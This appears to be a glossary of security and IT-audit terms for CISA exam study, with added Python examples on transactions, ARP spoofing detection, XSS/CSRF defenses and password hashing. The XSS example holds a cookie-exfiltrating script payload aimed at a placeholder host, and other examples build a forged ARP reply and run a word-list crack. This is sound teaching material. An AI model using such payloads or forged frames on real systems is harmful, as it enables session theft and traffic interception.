Glossary

802.11 standard The family of IEEE wireless LAN (Wi-Fi) standards developed by Working Group 11 of the IEEE LAN/MAN Standards Committee. The original 802.11 specification defined WEP, an RC4-based encryption scheme that has long been broken; current deployments use WPA2 or WPA3 instead.

A

accreditation Management’s formal acceptance of a system or an application.

ACID test Testing a transaction-processing system for four properties: atomicity, so that a unit of work is either applied entirely or not at all; consistency, so that a transaction is committed only if it leaves the data satisfying all system-defined integrity constraints; isolation, so that each transaction is isolated from all others until it completes; and durability, so that once a transaction has been committed its results persist even if the system subsequently fails.
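
As an added illustration of the atomicity and consistency properties (example code written for this glossary, not taken from the book; the accounts table, the opening balances, and the transfer rule are constructed for the demo), a small SQLite ledger in which a transfer that would break an integrity constraint is rolled back rather than left half-applied:

```python
"""Atomicity and consistency in a transaction-processing system.

Added example, not from the original glossary. The accounts table, the
opening balances, and the transfer rule are constructed for the demo; the
ledger lives in an in-memory SQLite database. Standard library only.
"""
import sqlite3


def make_bank() -> sqlite3.Connection:
    """Ledger with an integrity constraint: no account may go negative (consistency)."""
    # isolation_level=None turns off the module's implicit transactions so the
    # BEGIN/COMMIT/ROLLBACK below are issued explicitly.
    conn = sqlite3.connect(":memory:", isolation_level=None)
    conn.execute("CREATE TABLE accounts ("
                 "name TEXT PRIMARY KEY, "
                 "balance INTEGER NOT NULL CHECK (balance >= 0))")
    conn.executemany("INSERT INTO accounts VALUES (?, ?)", [("alice", 100), ("bob", 50)])
    return conn


def transfer(conn: sqlite3.Connection, src: str, dst: str, amount: int) -> bool:
    """Move `amount` from src to dst as one unit of work (atomicity).

    The credit is applied first on purpose: if the debit then violates the
    CHECK constraint, the ROLLBACK must also undo the credit, otherwise money
    would be created. Returns True on COMMIT, False on ROLLBACK.
    """
    if amount <= 0:
        raise ValueError("amount must be positive")
    conn.execute("BEGIN")
    try:
        steps = (
            ("UPDATE accounts SET balance = balance + ? WHERE name = ?", (amount, dst)),
            ("UPDATE accounts SET balance = balance - ? WHERE name = ?", (amount, src)),
        )
        for sql, params in steps:
            if conn.execute(sql, params).rowcount != 1:
                raise ValueError("unknown account")
        conn.execute("COMMIT")
        return True
    except (sqlite3.IntegrityError, ValueError):
        conn.execute("ROLLBACK")   # all or nothing: the partial credit disappears
        return False


def balances(conn: sqlite3.Connection) -> dict:
    return dict(conn.execute("SELECT name, balance FROM accounts ORDER BY name"))


def total_money(conn: sqlite3.Connection) -> int:
    """Invariant the ledger must preserve across every transfer."""
    return conn.execute("SELECT SUM(balance) FROM accounts").fetchone()[0]


if __name__ == "__main__":
    bank = make_bank()
    print(transfer(bank, "alice", "bob", 30), balances(bank))     # committed
    print(transfer(bank, "alice", "bob", 500), balances(bank))    # rolled back: alice cannot go negative
    print(transfer(bank, "alice", "nobody", 10), balances(bank))  # rolled back: unknown account
    print("total:", total_money(bank))
```

Isolation and durability are not shown here: an in-memory database has no second connection to race against and does not survive process exit, whereas a file-backed database with SQLite's default journal would.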

Address Resolution Protocol (ARP) A protocol used to map a known IP address to an unknown physical (MAC) address on the local network. IPv4 uses 32-bit addresses, whereas Ethernet uses 48-bit MAC addresses, so a host that knows only the destination IP address being passed down the stack broadcasts an ARP request asking which station owns it; that station replies with its MAC address, and the mapping is stored in the ARP cache for reuse. ARP has no authentication, so a forged reply can redirect local traffic (ARP spoofing), which is why cache entries should be monitored for unexpected changes.
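
An added example, not from the original glossary, that builds and parses the ARP request and reply frames described above and keeps a small ARP cache that flags an IP-to-MAC change. Every MAC and IP address is made up for the demo; the field layout follows RFC 826 inside an Ethernet II header.

```python
"""Build, parse, and cache the ARP frames described above.

Added example, not from the original glossary. Every MAC and IP address below
is made up; the field layout follows RFC 826 inside an Ethernet II header.
Standard library only.
"""
import ipaddress
import struct
from typing import Optional

ETHERTYPE_ARP = 0x0806
HTYPE_ETHERNET = 1
PTYPE_IPV4 = 0x0800
OP_REQUEST, OP_REPLY = 1, 2
BROADCAST_MAC = "ff:ff:ff:ff:ff:ff"
ARP_FMT = "!HHBBH6s4s6s4s"   # htype, ptype, hlen, plen, op, sender MAC/IP, target MAC/IP (28 bytes)
ETH_FMT = "!6s6sH"           # destination MAC, source MAC, ethertype (14 bytes)


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_arp(op: int, sender_mac: str, sender_ip: str, target_mac: str, target_ip: str) -> bytes:
    """A request is broadcast to every station; a reply is unicast to the asker."""
    eth_dst = mac_bytes(target_mac) if op == OP_REPLY else mac_bytes(BROADCAST_MAC)
    eth = struct.pack(ETH_FMT, eth_dst, mac_bytes(sender_mac), ETHERTYPE_ARP)
    arp = struct.pack(ARP_FMT, HTYPE_ETHERNET, PTYPE_IPV4, 6, 4, op,
                      mac_bytes(sender_mac), ipaddress.IPv4Address(sender_ip).packed,
                      mac_bytes(target_mac), ipaddress.IPv4Address(target_ip).packed)
    return eth + arp


def parse_arp(frame: bytes) -> dict:
    """Decode an Ethernet/ARP frame; rejects anything that is not ARP over IPv4/Ethernet."""
    if len(frame) < 42:
        raise ValueError("frame too short for Ethernet + ARP")
    eth_dst, eth_src, ethertype = struct.unpack(ETH_FMT, frame[:14])
    if ethertype != ETHERTYPE_ARP:
        raise ValueError(f"not ARP: ethertype 0x{ethertype:04x}")
    htype, ptype, hlen, plen, op, smac, sip, tmac, tip = struct.unpack(ARP_FMT, frame[14:42])
    if (htype, ptype, hlen, plen) != (HTYPE_ETHERNET, PTYPE_IPV4, 6, 4):
        raise ValueError("unsupported hardware/protocol type")
    return {
        "op": {OP_REQUEST: "request", OP_REPLY: "reply"}.get(op, f"op{op}"),
        "eth_dst": mac_str(eth_dst), "eth_src": mac_str(eth_src),
        "sender_mac": mac_str(smac), "sender_ip": str(ipaddress.IPv4Address(sip)),
        "target_mac": mac_str(tmac), "target_ip": str(ipaddress.IPv4Address(tip)),
    }


class ArpCache:
    """IP -> MAC table learned from frames seen on the wire."""

    def __init__(self) -> None:
        self.table: dict = {}

    def learn(self, frame: bytes) -> Optional[str]:
        """Record the sender's mapping. Returns a warning when an existing entry
        changes, the signature a defender looks for when hunting ARP spoofing."""
        p = parse_arp(frame)
        old = self.table.get(p["sender_ip"])
        self.table[p["sender_ip"]] = p["sender_mac"]
        if old is not None and old != p["sender_mac"]:
            return f"{p['sender_ip']} moved from {old} to {p['sender_mac']} (possible ARP spoofing)"
        return None


if __name__ == "__main__":
    host, gateway = "aa:bb:cc:dd:ee:01", "aa:bb:cc:dd:ee:ff"
    request = build_arp(OP_REQUEST, host, "192.168.1.10", "00:00:00:00:00:00", "192.168.1.1")
    print(parse_arp(request))
    cache = ArpCache()
    reply = build_arp(OP_REPLY, gateway, "192.168.1.1", host, "192.168.1.10")
    print(cache.learn(reply), cache.table)
    forged = build_arp(OP_REPLY, "11:22:33:44:55:66", "192.168.1.1", host, "192.168.1.10")
    print(cache.learn(forged))
```

A real cache also ages entries out, and a host will happily accept an unsolicited reply (gratuitous ARP), which is exactly what the forged frame above relies on; the warning from `learn` is the kind of signal that tools such as arpwatch raise.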

AES The current symmetric encryption standard (FIPS 197) and the replacement for DES. AES uses the Rijndael algorithm with a 128-bit block and 128-, 192-, or 256-bit keys. Used by WPA2.

agile An iterative, expedited, and incremental software development methodology.

algorithm A mathematical procedure used for solving a problem. Commonly used in cryptography.

application controls Controls related to a specific individual process within an application.

artificial intelligence (AI) An extension of expert systems that involves self-learning and cognitive processes used to mimic the thinking of humans with the speed of computers.

assessment An evaluation and/or valuation of IT assets based on predefined measurement or evaluation criteria. An accounting or auditing firm is not typically required to conduct an assessment such as a risk or vulnerability assessment.

asymmetric algorithm A routine that uses a pair of different but related cryptographic keys to encrypt and decrypt data.

asymmetric encryption In cryptography, use of an asymmetric key algorithm with a pair of cryptographic keys to encrypt and decrypt. The two keys are related mathematically, and a message encrypted by the algorithm using one key can be decrypted by the same algorithm using the other. In a sense, one key “locks” a lock (encryption), and a different key is required to unlock it (decryption).

audit An investigation by an accounting or auditing firm that conforms to a specific and formal methodology and definition for how the investigation is to be conducted, with specific reporting elements and metrics being examined (such as a financial audit according to Public Accounting and Auditing Guidelines and Procedures).

audit function An independent and objective function that provides leadership assurance that the organization complies with regulatory rules and industry norms.

audit universe The range of audit activities and auditable entities to be covered in an audit.

authentication The process of verifying a claimed identity. Authentication confirms that an individual (or system) requesting access is who it claims to be before access to a system and its resources is granted. Common authentication methods include passwords, tokens, and biometric systems.

automated controls Controls that are triggered through automation, such as validation and edit checks, programmed logic functions, and controls.

B

backdoor A piece of software, or a hidden feature in legitimate software, that allows access to a computer while bypassing the conventional security procedures. Backdoors are frequently installed by Trojans, but the terms are not synonymous: the Trojan is the delivery vehicle, and the backdoor is the resulting access path.

balance data Various values and totals that might be held temporarily during processing.

balanced scorecard (BSC) A scorecard that brings together in one view an array of key measurements, such as metrics, target values, and key indicators.

baseline A platform-specific minimum configuration (for example, a hardened build standard for a given operating system) that is accepted across the industry as providing the most effective approach to a specific implementation.

batch control Control that validates a batch of transactions, such as total dollar amounts, total counts, or total document numbers.

biometrics A method of verifying a person’s identity for authentication by analyzing a unique physical attribute of the individual, such as a fingerprint, retinal scan, or palm print.

blackbox testing A form of testing in which the tester has no knowledge of the target or its network structure.

Blowfish A form of symmetric block encryption designed in 1993.

Bluejacking Sending unsolicited messages, pictures, or information to a Bluetooth user.

Bluesnarfing Stealing information from a wireless device through a Bluetooth connection.

botnet A collection of compromised computers (bots or zombies) that an attacker controls remotely, typically through a command-and-control channel, and uses for activities such as spam, distributed denial of service, or credential theft.

bring-your-own-device (BYOD) The practice of allowing users to bring and use their personal devices on a corporate network.

buffer overflow In computer programming, a problem that occurs when a software application writes data beyond the allocated end of a buffer in memory. Buffer overflows are usually caused by software bugs such as missing bounds checks on input, and they can crash the application or allow an attacker to inject code or redirect control flow to commands of the attacker’s choosing.

business continuity planning A system or methodology to create a plan for how an organization will resume partially or completely interrupted critical functions within a predetermined time after a disaster or disruption occurs. The goal is to keep critical business functions operational.

business impact analysis A component of the business continuity plan that involves looking at all the components an organization relies upon for continued functionality. It seeks to distinguish which are more crucial than others and therefore require a greater allocation of resources in the wake of a disaster.

C

capability maturity model (CMM) A process that scores maturity of processes against industry standards.

carrier-sense multiple access with collision detection (CSMA/CD) The access method used by local area networking technologies such as Ethernet.

chain of custody The process and tools used to account for who had access to collected data and to protect it from being tampered with.

CISA certification A certification which ensures that individuals have the competency to provide leadership with the assurance that their organization complies with regulatory and industry norms.

CISA exam domains The basis for the CISA exam and the requirements to earn the certification; see job practice areas, or job domains.

CISA exam windows The three times per year when an individual can take the CISA exam. Each exam window is approximately 60 days long.

Code of Professional Ethics The code that ISACA has presented to guide the professional and personal conduct of members of the association and/or its certification holders. This is one of the three agreements you must sign off on as part of the CISA application.

cold site A site that contains no computing-related equipment except for environmental support, such as air conditioners and power outlets, and a security system made ready for installing computer equipment.

compliance function A discipline accountable for certifying compliance with regulatory rules and industry norms.

compliance test A test used to verify conformity to a specific standard.

computer-assisted audit techniques (CAATs) Software audit tools used for statistical sampling and data analysis.

computer-based testing (CBT) A format of testing completed on the computer instead of with paper and pencil.

continuing professional education (CPE) Continuing education hours that are required to maintain CISA certification. An individual maintains competency by attaining and reporting annual CPE hours.

continuous monitoring Repeated testing of a control through automation and alerting when a variance or defect is identified.

control function A discipline accountable for building, implementing, and maintaining technology controls.

Control Objectives for Information and Related Technologies (COBIT) A framework used to ensure quality, control, and reliability of information systems by establishing IT governance, management structure, and objectives.

control risk The risk related to a deployed control not working as expected.

control self-assessment (CSA) A process in which a business participates in a formal self-assessment of risk.

CPE hours See continuing professional education (CPE).

cracker A term derived from “criminal hacker,” someone who acts in an illegal manner.

criticality The quality, state, degree, or measurement of the highest importance.

critical path methodology (CPM) A methodology that determines what activities are critical and what the dependencies are among the various tasks.

Cross-Site Request Forgery (CSRF, also XSRF) An attack in which a victim’s browser is induced (for example, by a hidden form on an attacker’s page) to send a request the victim did not intend to a web application that trusts the victim, because the browser automatically attaches the victim’s session cookie. Defenses include anti-CSRF tokens and SameSite cookies.

Cross-Site Scripting (XSS) An attack that enables attackers to inject client-side scripts into web pages viewed by other users, typically because user-supplied input is placed into a page without output encoding. The injected script runs in the victim’s browser with the victim’s session.
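
An added example for the two entries above (written for this glossary, not taken from the book): a reflected greeting rendered with and without output encoding, and a state-changing endpoint with and without a synchronizer token. The page template, server secret, session identifier, form fields, and the placeholder URL in the sample payload are all made up for the demo.

```python
"""Vulnerable and hardened handling for the two web attacks defined above.

Added example, not from the original glossary. The page template, the server
secret, the session identifiers, the form fields, and the URL in the sample
payload are made up for the demo. Standard library only.
"""
import hashlib
import hmac
import html
import secrets

# ---- Cross-Site Scripting ---------------------------------------------------

def render_greeting_vulnerable(name: str) -> str:
    """Reflects user input straight into HTML; a <script> in `name` runs in every viewer's browser."""
    return f"<p>Hello, {name}!</p>"


def render_greeting_safe(name: str) -> str:
    """Output encoding for the HTML-body context: <, >, &, ' and " become entities."""
    return f"<p>Hello, {html.escape(name, quote=True)}!</p>"


# ---- Cross-Site Request Forgery ---------------------------------------------
# Synchronizer-token pattern: the server embeds a per-session token in its own
# forms and rejects state-changing requests that do not echo it back. A forged
# request from another site carries the victim's cookie but cannot read the
# token, so it is refused.

SERVER_SECRET = secrets.token_bytes(32)  # assumption: key held only by the server


def issue_csrf_token(session_id: str) -> str:
    """Token bound to the session so one user's token is useless for another."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def csrf_token_valid(session_id: str, submitted: str) -> bool:
    return hmac.compare_digest(issue_csrf_token(session_id), submitted)  # constant-time compare


def handle_transfer(session_id: str, form: dict, check_csrf: bool) -> str:
    """State-changing endpoint. With check_csrf=False it trusts any request that
    arrives with the session cookie, which is exactly what CSRF abuses."""
    if check_csrf and not csrf_token_valid(session_id, form.get("csrf_token", "")):
        return "403 Forbidden: missing or invalid CSRF token"
    return f"200 OK: transferred {form['amount']} to {form['to']}"


if __name__ == "__main__":
    payload = '<script>document.location="https://evil.example/?c="+document.cookie</script>'
    print(render_greeting_vulnerable(payload))  # script tag survives intact
    print(render_greeting_safe(payload))        # rendered as inert text

    victim_session = "sess-4f2a"                # assumption: the cookie the victim's browser sends
    forged_form = {"amount": "1000", "to": "attacker"}   # what a hidden cross-site form submits
    print(handle_transfer(victim_session, forged_form, check_csrf=False))
    print(handle_transfer(victim_session, forged_form, check_csrf=True))
    legit_form = dict(forged_form, csrf_token=issue_csrf_token(victim_session))
    print(handle_transfer(victim_session, legit_form, check_csrf=True))
```

The HMAC-derived token keeps the demo stateless; production frameworks usually store a random per-session token server side, and `html.escape` covers only the HTML-body context (attributes, JavaScript, and URLs each need their own encoding).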

D

data classification A method to simplify data handling rules by categorizing data into distinct data classes.

data lake A large store of raw data stored in its native format until it is needed.

data warehouse A large store of processed and refined data obtained from multiple sources that is generally used to guide management decisions.

decryption The process of converting encrypted content into its original form, often the process of converting ciphertext to plaintext. Decryption is the opposite of encryption.

defense-in-depth Multilayered security that combines administrative, technical (logical), and physical controls so that the failure of any single control does not expose the protected asset.

demilitarized zone (DMZ) The middle ground between a trusted internal network and an untrusted, external network. Services that internal and external users must use, such as HTTP, are typically placed in the DMZ.

detection risk The risk of a control defect going undetected, such as when an auditor fails to find a material error or a defect in a control.

Diameter A centralized authentication system that is seen as a replacement for RADIUS.

dictionary attack A type of password attack in which the attacker hashes each entry of a word list (dictionary) and compares the results with captured password hashes. Precomputed time/memory trade-off tables, such as rainbow tables, speed this up against unsalted hashes; a unique random salt per password defeats precomputation, and a slow, iterated hash makes each guess expensive.

digital certificate A certificate, usually issued by a trusted third party (a certificate authority), that binds the name of a user or server to that subject’s public key. It contains the subject name, the public key, validity dates, and other elements used in authentication and encryption, and it carries the issuer’s digital signature so that relying parties can verify it. X.509 is the most common format.

digital signature An electronic signature that can be used to authenticate the identity of the sender of a message and to detect any change to the message. A digital signature is created by hashing the message and encrypting (signing) the hash with the sender’s private key; a recipient decrypts it with the sender’s public key and compares the result with a freshly computed hash of the message.

direct-sequence spread spectrum (DSSS) A spread-spectrum modulation technique that multiplies the data signal by a higher-rate pseudorandom chipping code, spreading it across a wider frequency band so that it is more resistant to interference and harder to detect; used by 802.11b.

disaster A natural or man-made event that can include fire, flood, storm, and equipment failure that negatively affects an industry or facility.

disaster recovery A set of policies, procedures, and methodologies used to address the recovery or continuation of vital technology infrastructure and systems following a disaster.

Domain Name System (DNS) A service that translates human-readable domain names into IP addresses and vice versa. Because domain names are alphanumeric, they are easier to remember than IP addresses. The expansion Domain Name Service is common but informal.

Domain Name System Security Extensions (DNSSEC) A set of extensions to DNS that digitally signs DNS records so that resolvers can verify their origin and integrity. DNSSEC does not encrypt DNS traffic and provides no confidentiality.

dropper A program designed to drop a Trojan horse or malware onto the infected computer and then execute it. Also known as a wrapper.

E

e-commerce The buying, selling, and servicing of goods via the Internet.

encryption The process of turning plaintext into ciphertext.

encryption key A sequence of characters used by an encryption algorithm to encrypt plaintext into ciphertext.

enterprise architecture (EA) A blueprint that defines the business structure and operation of the organization.

enterprise risk management (ERM) The process of identifying and managing a portfolio of risk to provide key stakeholders with a substantiated and consistent opinion of risk across the enterprise.

entity integrity Assurance that each row in a database table has a unique, non-null primary key so that every record can be identified unambiguously.

entity relationship diagram (ERD) A diagram that helps map the requirements and define the relationships between elements.

equal error rate (EER) A comparison measurement for different biometric devices and technologies to measure their accuracy. The EER is the point at which FAR and FRR are equal or cross over. The lower the EER, the more accurate the biometric system.

Ethernet A network protocol that defines a specific implementation of the physical and data link layers in the OSI model (IEEE 802.3). Ethernet LANs provide reliable high-speed communications, from 10 Mbps in the original standard to 100 Gbps and beyond today, in a limited geographic area (such as an office complex or a university complex).

ethical hack A type of hack done to help a company or an individual identify potential threats on the organization’s IT infrastructure or network. Ethical hackers must obey rules of engagement, do no harm, and stay within legal boundaries.

ethical hacker A security professional who legally attempts to break into a computer system or network to find its vulnerabilities.

exploit Code or a technique that takes advantage of a vulnerability in software or hardware to gain access to a system or service. The vulnerability is the flaw; the exploit is what abuses it.

F

false acceptance rate (FAR) A type II biometric device error. It is a biometric system measurement that indicates the percentage of individuals who are incorrectly granted access. This is the worst type of error that can occur because it means that unauthorized individuals have been allowed access.

false rejection rate (FRR) A biometric device error that is considered a type I error. It is a biometric system measurement that indicates the percentage of authorized individuals who are incorrectly denied access.

fiber-optic cable A medium for transmission composed of many glass fibers. Light-emitting diodes or lasers send light through the fiber to a detector that converts the light back to an electrical signal for interpretation. Advantages include huge bandwidth, immunity to electromagnetic interference, and the capability to traverse long distances with minimal signal degradation.

fiduciary A duty of an individual (such as an auditor) who holds a position of special legal trust and responsibility.

file infector A type of virus that copies itself into executable programs.

financial audit A review and evaluation of financial statements and processes.

firewall security A system in hardware or software form used to manage and control both network connectivity and network services. Firewalls act as chokepoints for traffic entering and leaving the network and prevent unrestricted access. Firewalls can be stateful or stateless.

flowchart A graphical categorization of inputs and outputs related to a process or code logic.

frequency-hopping spread spectrum (FHSS) One of the basic modulation techniques used in spread-spectrum signal transmission. FHSS makes wireless communication harder to intercept and more resistant to interference.

function point analysis (FPA) An ISO-approved method for estimating the complexity of software.

fuzzing A testing technique that feeds a program large volumes of malformed, random, or otherwise unexpected input and monitors for crashes, hangs, and other failures that indicate bugs. It is often performed as blackbox testing, though coverage-guided fuzzers use instrumentation of the target.

G

general controls Controls that apply across all system components, processes, and data.

gray box testing Testing that occurs with only partial knowledge of the network or that is performed to see what internal users have access to.

guidelines A suggested set of behaviors.

H

hash A fixed-length, one-way value computed from data by a cryptographic hash function. A hash is considerably shorter than the original text and, for a secure function, identifies it uniquely in practice. You might have seen a hash value next to applications available for download on the Internet: by comparing the hash of the downloaded file with the one on the application vendor’s website, you can check that the file has not been changed or altered. This helps only if the published hash itself is trustworthy, which is why vendors also sign their releases.

hashing algorithm An algorithm that is used to verify the integrity of data and messages. A well-designed hashing algorithm examines every bit of the data while it is being condensed, and even a slight change to the data results in a large change in the message hash. It is considered a one-way process. MD5 and the SHA family are examples of hashing algorithms; MD5 and SHA-1 are no longer collision resistant and should not be used for signatures or integrity protection.
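
An added example covering the hash, hashing algorithm, and dictionary attack entries (written for this glossary, not taken from the book): a download integrity check, the avalanche effect, a word-list attack on unsalted SHA-256 password hashes, and the salted, iterated alternative that defeats it. The file contents, word list, and user accounts are constructed for the demo.

```python
"""Hash-based integrity checks and why unsalted password hashes fall to a dictionary attack.

Added example, not from the original glossary. The download contents, the word
list, and the user accounts below are constructed for the demonstration.
Standard library only.
"""
import hashlib
import hmac
import os


def sha256_hex(data: bytes) -> str:
    """One-way, fixed-length digest of arbitrary input."""
    return hashlib.sha256(data).hexdigest()


def verify_download(content: bytes, published_hex: str) -> bool:
    """Compare a downloaded file's digest with the value the vendor published."""
    return hmac.compare_digest(sha256_hex(content), published_hex)


def differing_bits(hex_a: str, hex_b: str) -> int:
    """Hamming distance between two digests; shows the avalanche effect."""
    return bin(int(hex_a, 16) ^ int(hex_b, 16)).count("1")


def dictionary_attack(targets: dict, wordlist) -> dict:
    """targets maps username -> unsalted SHA-256 hex of the password.

    One pass over the word list builds a digest -> word table (a tiny rainbow
    table), and every account whose hash appears in it is cracked at once.
    """
    lookup = {sha256_hex(word.encode()): word for word in wordlist}
    return {user: lookup[digest] for user, digest in targets.items() if digest in lookup}


def hash_password(password: str, salt: bytes = None, iterations: int = 200_000) -> str:
    """Salted, iterated hash (PBKDF2-HMAC-SHA256).

    A random per-password salt defeats precomputed tables, and the iteration
    count makes each guess expensive. The stored format is constructed for this demo.
    """
    if salt is None:
        salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def check_password(password: str, stored: str) -> bool:
    _algo, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    installer = b"constructed installer bytes"
    print("download intact:", verify_download(installer, sha256_hex(installer)))
    print("bits changed by a one-character edit:",
          differing_bits(sha256_hex(b"hello"), sha256_hex(b"hellp")), "of 256")

    words = ["password", "letmein", "Summer2024", "hunter2"]
    accounts = {"alice": sha256_hex(b"hunter2"), "bob": sha256_hex(b"hunter2"),
                "carol": sha256_hex(b"c0rrect-h0rse-battery")}
    print("cracked:", dictionary_attack(accounts, words))   # alice and bob share a weak password
    stored = hash_password("hunter2")
    print("salted hash verifies:", check_password("hunter2", stored))
```

Two things the output makes concrete: identical passwords produce identical unsalted hashes, so a single lookup cracks every account using that password, and two salted hashes of the same password differ, so a precomputed table is useless against them.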

hash total A calculation generated by choosing a selected number of fields in a series of transactions.

honeypot An Internet-attached server that acts as a decoy, luring in potential hackers in order to study their activities and monitor how they are able to break into a system.

hot site A fully prepared and configured site that is ready for use.

hub An older network device used for physical connectivity in networks. It provides connectivity, amplification, and signal regeneration, but it repeats every frame out of every port, so any attached device can capture all traffic on the segment; switches replaced hubs largely for this reason.

I

information security/cybersecurity The people, processes, and technology in which technology security risks are assessed and electronic data is protected against unauthorized access.

information systems standards The standards adopted by ISACA that are a cornerstone of its professional contribution to the audit and assurance community. One of the three agreements you must sign off on as part of the CISA application.

Information Technology Infrastructure Library (ITIL) A series of documents that define how to execute information technology service management (ITSM) processes.

inherent risk The risk that exists if no controls are deployed.

integrated audit An audit that covers all controls, including technology, financial, and operational controls, in determining an effective set of internal controls for the protection of an organization’s assets.

Integrated Services Digital Network (ISDN) A system that provides simultaneous voice and high-speed data transmission to the user’s premises over a single line, using separate bearer (B) channels for traffic and a delta (D) channel for signaling. ISDN is an international standard for the end-to-end digital transmission of voice, data, and signaling.

Internet An interconnected system of networks that connects computers around the world via TCP/IP.

Internet Control Message Protocol (ICMP) Part of TCP/IP that supports diagnostics and error control. The ping utility uses ICMP echo request and echo reply messages.

Internet Protocol spoofing (IP spoofing) A technique in which an attacker forges the source address of IP packets, used to gain unauthorized access to computers, to evade address-based filtering, or to conduct denial of service attacks. Ingress and egress filtering on routers and firewalls offers protection against IP spoofing.

Internet Protocol (IP) One of the key protocols of TCP/IP. The IP protocol is found at Layer 3 (network layer) of the OSI model.

intrusion detection system (IDS) A network monitoring device typically installed at Internet ingress/egress points that is used to inspect inbound and outbound network activity and identify suspicious patterns that might indicate a network or system attack from someone attempting to break into or compromise a system.

IT steering committee A group that is tasked with ensuring that the IT department’s goals are properly aligned with the goals of the business.

J

JBOD (just a bunch of disks) A technique that is somewhat like RAID, in that two or more hard drives are combined into one storage array. However, JBOD offers none of the fault tolerance advantages of RAID.

job practice areas, or job domains The five domains of the CISA exam:

Domain 1—The Process of Auditing Information Systems

Domain 2—Governance and Management of IT

Domain 3—Information Systems Acquisition, Development and Implementation

Domain 4—Information Systems Operations, Maintenance and Service Management

Domain 5—Protection of Information Assets

K

Kerberos A network authentication protocol that provides single sign-on through a key distribution center (KDC) composed of an authentication service and a ticket-granting service. Clients obtain time-limited tickets from the KDC and present them to services instead of passwords.

key goal indicator (KGI) A key metric that shows how well a process is performing against a stated goal.

key performance indicator (KPI) A key metric that shows how well a process is performing.

kilo lines of code (KLOC) A technique used to determine the cost of software development that is based solely on length of code.

knowledge statements Questions on the CISA exam that cover hard skills such as how to plan an audit.

L

lagging indicator An indicator of an event that appears well after the initial event occurs.

leading indicator An indicator of an event that appears before the initial event occurs.

legal function A discipline accountable for understanding the core set of commonly accepted rules and principles of the industry in adherence to the law.

local area network (LAN) A group of wired or wireless computers and associated devices that share a common communications line and typically share the resources of a single processor or server within a small geographic area (for example, within an office building).

logic bomb A dangerous type of malware that waits for a predetermined event or an amount of time to execute its payload. Typically used by disgruntled employees for insider attacks.

long-term business goals Goals with a strategic focus on activities planned for the next three to five years.

M

MAC filtering A method of controlling access on a wired or wireless network by denying access to a device whose MAC address does not match one on a preapproved list. Because a MAC address can be changed in software, MAC filtering deters only casual access and should not be the sole control.

macro infector A type of computer virus that uses Microsoft Office products such as Word and Excel. When a user opens a Microsoft document containing a malicious macro, the computer can become infected.

macro virus A type of computer virus that infects documents through their macro code. Melissa is the classic example; the ILOVEYOU worm, often grouped with it, was actually a VBScript email attachment rather than a document macro.

man-in-the-middle (MITM) attack A type of attack in which the attacker can read, insert, and change information being passed between two parties without either party knowing that the information has been compromised.

mantrap A system of two doors that allows one person to enter the first door; then, after it is closed, the second door is allowed to open. Mantraps are used to control access and are also known as deadman doors.

manual controls Controls that staff must manually verify or execute, such as the review of reconciliation reports and exception reports.

massive array of idle disks (MAID) A storage architecture designed to remove the biggest obstacle to using hard disks for archive storage, namely power consumption. Drives in a MAID are spun up only when their data is accessed and are powered down when idle.

material Significant and having a real impact on an organization.

maximum tolerable downtime (MTD) The maximum period of time that a given business process can be inoperative before the organization’s survival is in jeopardy.

media access control (MAC) address The address of a network interface at the data link layer. Every network interface controller is assigned a unique 48-bit MAC address by its manufacturer. Although often described as hard-coded, the address a device presents on the network can be changed in software, so it cannot be relied on as proof of identity.

metadata Data about data, which describes the type of data contained in a file.

mindset An attitude and core principles we need to follow as professionals. The mindset sets the bar on how we should think about the challenges presented to us.

Moore’s law The observation that the processing power of computers doubles roughly every 18 to 24 months because the number of transistors that fit on a chip doubles in about that time.

multipartite virus A virus that attempts to attack both the boot sector and executable files.

multiple input, multiple output (MIMO) A system used in the implementation of the 802.11n standard that has multiple antennas and multiple radios.

Multiprotocol Label Switching (MPLS) A method of data-carrying used for long haul of data by high-performance telecommunications networks. MPLS directs traffic by using short path labels rather than long network addresses, thereby speeding up the process.

MU-MIMO A set of multiple-input and multiple-output technologies for wireless communication that is used by newer wireless access points to allow more devices to communicate simultaneously.

My Certifications (ISACA website) A web page on the ISACA website where you can manage your ISACA accounts and certifications.

N

network address translation (NAT) A method of connecting multiple computers to the Internet using one IP address. Many private addresses can be converted to a single public address.

Network Operations Center (NOC) The team and facility that monitor and manage an organization’s network infrastructure, handling outages, performance problems, and change activity. The NOC is distinct from the help desk (service desk), which is the interface to end users where trouble calls, questions, and trouble tickets are generated.

nonrepudiation A system or method put in place to ensure that an individual cannot deny his or her own actions.

nonstatistical sampling A type of sampling in which an auditor selects the sample size and determines which items to select; also known as judgmental sampling.

O

object breakdown structure (OBS) A diagram that is used to display organizational relationships and define which users are assigned to work on a specific area of a project.

operational audit An audit to assess how well business operations are managed. This includes reviewing the organization’s policies, key processes, controls, and operating environment.

operational risk The risk of loss or disruption from inadequate or failed internal processes, controls, people, and systems. In the context of information systems, it is the loss or disruption of technology capability caused by such failures.

outsourcing Using an external service provider to deliver services or solutions on an organization’s behalf.

P

packet A formatted unit of data sent over a network. Its header carries the addresses of the sending and receiving stations and control information, such as a checksum, used for routing and error detection.

packet switching A data transmission method that involves dividing messages into standard-sized packets for greater efficiency in routing and transporting them through a network.

paper test A type of disaster-recovery test that involves reviewing the steps of the test without actually performing the steps. This type of disaster-recovery test is usually used to help team members review the proposed plan and become familiar with the test and its objectives.

password cracking The process of recovering passwords from data that has been secured by various mechanisms such as hashing.

penetration test A method of evaluating the security of a network or computer system by simulating an attack by a malicious hacker but without doing harm and with the owner’s consent.

personal area network (PAN) A small network used to connect Bluetooth devices.

phishing The act of misleading or conning an individual into releasing and providing personal and confidential information to an attacker masquerading as a legitimate individual or business.

phreaker An individual who hacks phone systems or phone-related equipment. Phreakers predate computer hackers.

Plan-Do-Check-Act (PDCA) An iterative four-step problem-solving model that promotes continuous improvement.

policy A set of behavior rules mandated by management; the policy environment often includes standards, procedures, and baselines.

polymorphic virus A virus that is capable of change and self-mutation.

